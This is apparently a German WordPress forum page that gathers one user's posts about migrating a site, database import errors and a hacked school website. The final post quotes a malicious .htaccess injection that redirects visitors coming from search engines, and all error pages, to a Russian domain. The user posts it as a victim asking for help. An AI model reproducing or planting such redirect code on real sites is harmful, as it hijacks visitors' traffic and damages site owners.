Danke für die Antwort!! Werde mal fragen!
LG!
Jan
Beiträge von Jannemann23
-
-
D.h. grundsätzlich kann man dieses Angaben die da ausgeworfen werden von http://whatwpthemeisthat.com/ schon übersteuern?
-
Hallo,
finde ein Website ziemlich gut von der Gestaltung her. Ich weiß die Site läuft auf Wordpress und normalerweise finde ich schnell mit http://www.whatwpthemeisthat.com raus, welche Theme von welchem Anbieter verwendet wird. Bei der Seite http://www.dinahpannos.at/ werden nur die Details des Webdesigners angezeigt, als hätte er es selber programmiert - nicht unmöglich, aber nicht sehr wahrscheinlich.
Kann man es verstecken, dass das premium theme angezeigt wird?
Weiß jemand was hier verwendet werden könnte? Studiopress mit einem Childtheme?Danke schon mal, wenn jemand eine Idee hat!! :wink::wink:
LG!! -
Ok, habe den das ganze Verzeichnis rüber kopiert auf eine andere Domain beim alten Server die ich noch hatte. Das hat mit den zwei DB einträgen sofort funktioniert. Jetzt kann ich mit dem Plugin Dublicator das ganze für den neuen Server als Paket vorbereiten. Klassischer Umzug aus einen "einfachen" Backup der Daten und der DB funktionierte in letzter Zeit nicht mehr wirklich... habe nie heraus gefunden woran es lag. Mit dem Dublicator ist es super, auch wenn man beim "einpacken" einiges erst mal ausschließen muss (Uploads, Gallery) damit der Vorgang nicht abbricht... diese kopiert man hinterher wieder per ftp dazu... meine Lehre daraus: immer erst mit der Seite auf eine Subdomain des neuen Servers umziehen bevor man die Domain transferiert... andersrum ist richtig blöd... :)
Danke nochmal!!
LG -
Hallo,
schon mal danke für die Antworten. Kann schon auf alle Daten zugreifen über myphp. Nur würde ich gerne noch einmal wie gewohnt ins Wortpress einsteigen.
Versuche halt irgendwie auf die wp-Login.php zuzugreifen nun da die ursprüngliche Domain transferiert wurde. Die IP habe ich - nur weiß ich nicht durch was ich die ursprünglich Domain ersetzen muss, nun das die Domain weg ist. Ich denke durch die Standard Subdomain... da bin ich aber anscheinend zu blöd die ausfindig zu machen. Bei Google finde ich auch nichts über "GoDaddy Standard Subdomain finden" o.ä. ...
Nie wieder umziehen.... grrr...LG!!
Jan -
Hi Leute,
ich hatte einen laufenden Wordpress Blog mit einer Domain alles bei GoDaddy. Jetzt wollte ich mit der Seite und der Domain umziehen und habe vorher natürlich alles brav gebackupt. Die Domain ist nun bereits transferiert zum neuen Host. Nun müsste ich unbedingt noch mal auf das alte Wordpress zugreifen. Logischerweise funktioniert der alte Login http://domain.at/wp-login.php ja nicht mehr, da die Domain ja schon transferiert ist. Ich frage mich nun ob ich ohne die Domain noch auf das alte am alten Server vorhandene Wordpress zugreifen kann. Oder geht das ohnehin nicht, da auch in der DB immer auf die Domain verwiesen wird...
Ist wahrscheinlich eine ziemlich dämliche Frage...Danke trotzdem!! :)
LG!
Jan -
Super, danke Mathuseo, Monika und Hille! Auch gut der Hinweis, dass man eigenes Hosting nur machen sollte, wenn es definitiv auch zum eigenen gewollten Bereich gehört!
Lg!! Jan -
Hey super, danke für die Antworten. Finde es toll wenn sich Zeit genommen wird auch für nicht so ganz fortgeschrittene Fragen :-) Aber ich habe wirklich nichts gefunden und evt. stellt sich jemand anders ja auch diese Frage irgendwann. Liebe Grüße!! Jan
-
Hallo,
habe jetzt schon hin und hergegoogelt, ist aber nicht einfach da ein gutes Suchergebnis zu bekommen, weil die Suchbegriffe nur zu Hostingprovidern führen. Die Frage ist vielleicht dämlich, aber wie macht ihr das mit Seiten von Kunden und der Domain. Lasst ihr die Kunden Ihre Domain sichern und ihr eigenes Hosting-Paket abschließen, oder hostet ihr die Seite auf einem Eurer Pakete und sichert die Domain auf Euren Namen. Oder Kunde (Domain) und Ihr installiert die Seite in einem Eurer Hosting Pakete?
Also was ist "gängig"? :confused:
Sorry, aber ich habe wirklich nichts zu dieser Fragestellung gefunden.Danke schon mal für jeden Kommentar!
LG!
Jan -
ok, dieses Problem auch gelöst...
Der User, welcher der Datenbank zugewiesen wird, hatte nicht alle Berechtigungen.
Ich habe eine Datenbank angelegt und einen User dazu mit allen Berechtigungen.
Nun sind alle Datenbanken mit dem SQL Dumper transferiert worden! Sehr gut soweit... -
Kurz vor dem Ziel...es ist zum Mäuse melken
Vermute schwer, dass der Umzug so mühsam ist, weil ich BulletProofSecurity am Blog installiert habe.
Jetzt habe ich alles mit dem MySQLDumper exportiert und will am neuen Server die Sicherungsdatei Wiederherstellen und bekomme ich die Meldung:MySQL-ERROR
MySQL meldet:
Access denied for user 'Jan_fkc01use'@'localhost' to database 'information_schema'
Fehler bei der Anfrage:
DROP TABLE IF EXISTS `xxxxwp_bpspro_login_security`;
DROP TABLE IF EXISTS `xxxx2wp_bpspro_login_security`; -> Access denied for user 'Jan_fkc01use'@'localhost' to database 'information_schema'Kann es sein, dass die Tabellen noch irgendwie durch die BulletProofSecurity geschützt sind? :confused::?
BPS war mir schon immer irgendwie suspekt... :)Liebe Grüße und danke schon mal für jede Idee!!
Jan -
Vielen Dank für die Antwort R23!
Ich werde schauen, dass die Export-Import Funktion zum laufen bringe!
LG!! -
Hallo,
die Suchfunktion hat nichts ergeben. In allen Instruktionen steht, bei einem Umzug exportiert man die DB Tabellen mittels Export und dann Import beim neuen Host. Kann das auch mit dem php Sicherungsassistenten geschehen und dann mit der Wiederherstellen-Funktion desselben beim neuen Host? (Export Funktion beim alten Host funktioniert irgendwie nicht) Jedenfalls bekomme ich die Site nach dem Umzug nicht zum laufen... evtl. liegt es ja daran..
Kann da jemand was zu sagen?
Danke schon mal vielmals!!
LG!
Jan -
Alles anzeigen
Da ich vor drei Jahren ein ähnliches Problem hatte, wäre mein Lösungsvorschlag:
- WP lokal auf Deinem Rechner z. B. über Xampp zu installieren
Wenn dann keine Manipulation an Deiner Installation statt findet, liegts am Provider. Du fummelst dich ansonsten wirklich tot.
Es gibt auch mehrere Tools wie z. B. firebug, wo man den Schadcode mit lokalisieren kann. Wahrscheinlich findet sich der Schadcode in der DB wieder, und von daher würde ich auch erst mal die Datenbank sichern und nach entsprechenden Stellen suchen lassen.
Viel Erfolg und lange Nächte
Dieter
Und wenn die (wer auch immer) Zugang zu meinem Wordpress haben (und somit auch zur Datenbank - da ja die zugangsdaten in der config stehen) können "die" noch irgendeinen Schadcode beim Host selber hinterlegen? Muss nicht alles von denen weg sein, wenn ich per filezilla ftp das ganze root verzeichnis lösche UND die DB Tabellen im PHP Admin lösche?! *verwirr sei*
:?
-
Alles anzeigen
Da ich vor drei Jahren ein ähnliches Problem hatte, wäre mein Lösungsvorschlag:
- WP lokal auf Deinem Rechner z. B. über Xampp zu installieren
Wenn dann keine Manipulation an Deiner Installation statt findet, liegts am Provider. Du fummelst dich ansonsten wirklich tot.
Es gibt auch mehrere Tools wie z. B. firebug, wo man den Schadcode mit lokalisieren kann. Wahrscheinlich findet sich der Schadcode in der DB wieder, und von daher würde ich auch erst mal die Datenbank sichern und nach entsprechenden Stellen suchen lassen.
Viel Erfolg und lange Nächte
Dieter
Was mir auch noch nicht klar ist, wenn ich auch alle Tabellen in der SQL Datenbank gelöscht habe, wie kann der Schadcode in der DB liegen?
Liebe Grüße!!
-
...
Alles anzeigenDa ich vor drei Jahren ein ähnliches Problem hatte, wäre mein Lösungsvorschlag:
- WP lokal auf Deinem Rechner z. B. über Xampp zu installieren
Wenn dann keine Manipulation an Deiner Installation statt findet, liegts am Provider. Du fummelst dich ansonsten wirklich tot.
Es gibt auch mehrere Tools wie z. B. firebug, wo man den Schadcode mit lokalisieren kann. Wahrscheinlich findet sich der Schadcode in der DB wieder, und von daher würde ich auch erst mal die Datenbank sichern und nach entsprechenden Stellen suchen lassen.
Viel Erfolg und lange Nächte
Dieter
Danke Dieter!
Wenn ich Xampp installiere funktioniert Xampp als quasi "Web Host" auf meinem Rechner (wenn dieser an ist)?
Wie lasse ich in den downgeloadeten Datenbank Tabellen nach dem Schadcode suchen? Mit dem normalen Virenscanner?
Lg
Jan -
Nochmaliger Versuch...
Also folgendes:
Habe per Filezilla das komplette Rootverzeichnis gelöscht - tutti completti - und Wordpress 3.3.2 ungezipt hochgeladen - quasi ready to installund schwupps ist schon wieder die .htaccess da mit dem code, der auf der russische Seite routet...
daraus schließe ich: der Code muss immer wieder eingeschleust werden, entweder vom Server aus, oder von meinem Rechner (Client)
am I wrong?!
am I verzweifelt -> definately yes:(
-
-
..
Da hast Du glaube ich etwas verwechselt. Der Server MUSS FastCGI oder das Apache Modul nutzen, wenn diese Sicherheitslücke ausgeschlossen werden soll.
Jeder halbwegs vernünftige Hoster sollte da mittlerweile entsprechend gehandelt haben...
Da bin ich mir gar nicht so sicher ob dieser supremecenter104.com dingsbumsserver soweit ist...
-
und weiter gehts...
Hallo allerseits!
Danke noch malig für die Antworten! Sorry wenn ich länger brauche um zu Antworten, aber mit meinem bescheidenen Wissen in diesem Feld dauert das „Verarbeiten“ der guten Informationen hier ein wenig! [FONT=Wingdings][FONT=Wingdings]J[/FONT][/FONT]
Das dieses „Silence is golden“ dazu gehört ist schon mal beruhigend!
r23 – ja, hatte wirklich alles vom Server geschmissen. Log Files anschauen klingt gut, diese sind mit meinem Zugang auf den Server aber nicht auffindbar... Ist ein wenig „unglücklich“ die Situation – mache die Site für eine Kambodschanische Schule. Welche Zusätzlichen Infos wären denn hilfreich? Damit will ich nicht geizen ;)
- Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e
- MySQL-Client-Version: 5.0.32
- PHP Erweiterung: mysql

Und ich denke das mit dem Server ist derzeit auch eines meiner Hauptprobleme
Der Server nennt sich supremecenter104.com und ich habe einen User+Passwort bekommen. Ehrlich gesagt, keine Ahnung ob dieses supremecenter.com wirklich seriös ist. Was macht das auf euch für einen Eindruck?
Komme da nur ins PHPAdmin + ich habe die FTP Zugangsdaten. Habe die Seite von jemanden übernommen, dem die Domain und auch das Hostingpaket gehört und den muss ich auch immer anschreiben zwecks Passwortänderungen etc. Würde der Schule auch vorschlagen zu wechseln auf einen „sichereren“ Server, aber der Typ hat sich aber die Domain der Schule Khmerchild.org gesichert und ich weiß gar nicht ob der die hergibt – abgesehen davon, dass ich mich erst mal erkundigen müsste, wie ich die Domain auf einem anderen Hostpaket nutzen kann – kenne nur die gesamtpakete zB von GoDaddy wo die Domain dabei ist… kann man die Domain einfach übernehmen? Oh man…
Zu eval(...b.a.se6.4_de.code -> das müsste der Expoid Scanner doch finden oder? Ich mein, der Entwickler des PlugIns macht sich hoffentlich auch seine Gedanken oder? Oder doch nicht? [FONT=Wingdings][FONT=Wingdings]J[/FONT][/FONT]
Timthumb: timthumb.php ist keine auf meinem Server…und war auch nicht in den alten Dateien die vorher oben waren…
Zum Theme: Das habe ich mit der Artisteer Software erstellt… Wie sicher das ist weiß ich nicht… Sollte aber schon sicher sein…Hatte aber auch schon die Idee alles noch einmal frisch aufzuspielen ohne das Theme und mal zu schauen ob es dann weg ist. Kann man heraus finden ob ein Theme sicher ist?!
Habe jetzt gerade noch mal in die .htaccess geschaut und da steht auf einmal folgendes:
(Die .htaccess hat aber die ganze Zeit nur 444 also die Leseberechtigung!!?? – das heißt das Script ändert auch die Rechte der Datei oder?!)
________________________
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://key-midi.ru/lambada?2 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://key-midi.ru/lambada?2 [R=301,L]
</IfModule>
# BULLETPROOF PRO 5.D DEFAULT .HTACCESS
# If you edit the line of code above you will see error messages on the BPS Security Status page
# WARNING!!! THE default.htaccess FILE DOES NOT PROTECT YOUR WEBSITE AGAINST HACKERS
# This is a standard generic htaccess file that does NOT provide any website security
# The DEFAULT .HTACCESS file should be used for testing and troubleshooting purposes only
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
ErrorDocument 400 http://key-midi.ru/lambada?2
ErrorDocument 401 http://key-midi.ru/lambada?2 ErrorDocument 403 http://key-midi.ru/lambada?2 ErrorDocument 404 http://key-midi.ru/lambada? ErrorDocument 500 http://key-midi.ru/lambada?2 _____________________________________________________
Wie und wo in der PHP ist denn das Script versteckt . Und wie haben die es auf den Leeren Server wieder bekommen ..
@infected: Werde das mit der kapersky rescue cd auch mal probieren…
Das kann noch was werden …
Oje..
Danke aber!!!!
Lg